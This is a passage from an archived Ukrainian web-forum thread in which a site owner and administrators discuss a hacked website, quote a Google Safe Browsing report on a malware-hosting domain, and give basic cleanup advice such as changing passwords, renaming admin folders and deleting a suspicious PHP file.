176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/typo/bullet.gif HTTP/1.1" 55 "http://www.skarbmudr...typography.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/footer-bg.png HTTP/1.1" 16888 "http://www.skarbmudr...s/template.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/box/box-bm.png HTTP/1.1" 3047 "http://www.skarbmudr...ss/modules.css" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

176.8.158.11 - - [09/Jan/2014:13:56:40 +0200] 200 "GET /templates/shaper_vision/images/favicon.ico HTTP/1.1" 1406 "-" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0" "-"

Посилання на коментар
Поділитись на інші сайти

  • Адміністратори

Який статус у списку наразі має сайт tellmesomenews.teaches-yoga.com?

Цей сайт наразі не внесено до списку підозрілих.

За попередні 90 днів кількість випадків, коли деякі сторінки сайту було внесено до списку за підозрілу активність, становить 1.

Що сталося під час останньої перевірки цього сайту системою Google?

Протягом попередніх 90 днів ми перевірили 2 стор. сайту й виявили, що діяльність на 0 стор. призводить до завантаження чи встановлення зловмисного програмного забезпечення без згоди користувача. Востаннє система Google виконувала перевірку цього сайту 2014-01-09, останнього разу підозрілий вміст на ньому виявлено 2014-01-09.

Зафіксовано, зокрема, таке зловмисне програмне забезпечення: 1 exploit(s).

Сайт розміщено в кількох мережах (1), включаючи
AS30158 (ARIMA-NETWORKS)
.

Чи був цей сайт проміжною ланкою в подальшому поширенні зловмисного програмного забезпечення?

Очевидно, протягом попередніх 90 днів сайт tellmesomenews.teaches-yoga.com був проміжною ланкою в зараженні інших сайтів (2), зокрема
mfmcampushq.org/
,
anteam.ru/
.

Чи розміщено на цьому сайті зловмисне програмне забезпечення?

Так. За попередні 90 днів на цьому сайті розміщувалося зловмисне програмне забезпечення. Ним заражено кілька доменів (492), зокрема
gepicsipke.hu/
,
carteldeportivo.com/
,
angarskmega.ru/
.

Посилання на коментар
Поділитись на інші сайти

  • Адміністратори

в гуглі є трішки про sys09725827.php і як вже тут прозвучало:

міняти паролі, читати логи, ...

- заборонити до вичищення доступ до адмінських каталогів хоча б їх переіменуванням

- поставити http авторизацію з паролем відмінним від адмінки

Посилання на коментар
Поділитись на інші сайти

Тааакс, адмінки переіменував.

sys09725827.php найшов, прибив.

а як поставити http авторизацію з паролем відмінним від адмінки і куда?

Посилання на коментар
Поділитись на інші сайти

Заархівовано

Ця тема знаходиться в архіві та закрита для подальших відповідей.



×
×
  • Створити...